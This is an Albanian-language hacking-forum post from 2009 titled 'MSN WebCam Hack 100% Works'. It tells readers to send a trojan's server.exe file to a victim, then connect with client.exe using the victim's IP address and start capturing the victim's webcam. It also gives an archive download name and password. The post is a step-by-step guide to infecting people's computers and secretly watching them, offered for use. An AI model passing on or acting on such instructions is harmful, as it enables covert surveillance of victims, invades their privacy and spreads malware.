Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 MSN WebCam Hack 100% Punon

Shko poshtë 
AutoriMesazh
Armend
Admin
Admin
avatar

Numri i postimeve : 433
Poenat e Antarit : 1591
Thanks : 16
Join date : 24/03/2009
Age : 26
Location : Kosova, Prishtin

MesazhTitulli: MSN WebCam Hack 100% Punon   Thu May 21, 2009 10:44 pm

Pra pasi ta keni Downloaduar Programin.
Aty jan disa fajlla me emrin server.exe dhe client.exe

Fajllin server.exe mos e hapni sepse kete file ju duheni ti ja dergoni viktimes
pasi viktima e pranon fajllin dmth e hap fajllin ne duhet ta hapim Client.exe siq shihet ne foto. Aty ku eshte IP duhet ti Japim IP e viktimes pastaj connect, pasi jemi lidhur me viktimen klikojm ne start capture.


ps.per marrjen e ip ka metoda te ndryshme pra siq osht e njohur permes cmd.


Download :
Kodi:
rapidshare.com Webcam_Trojan_Hacker_freak_tutoriale-ks.com.zipPassword :
Kodi:
freak4tutoriale
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://drenica.albanianforum.net
 
MSN WebCam Hack 100% Punon
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: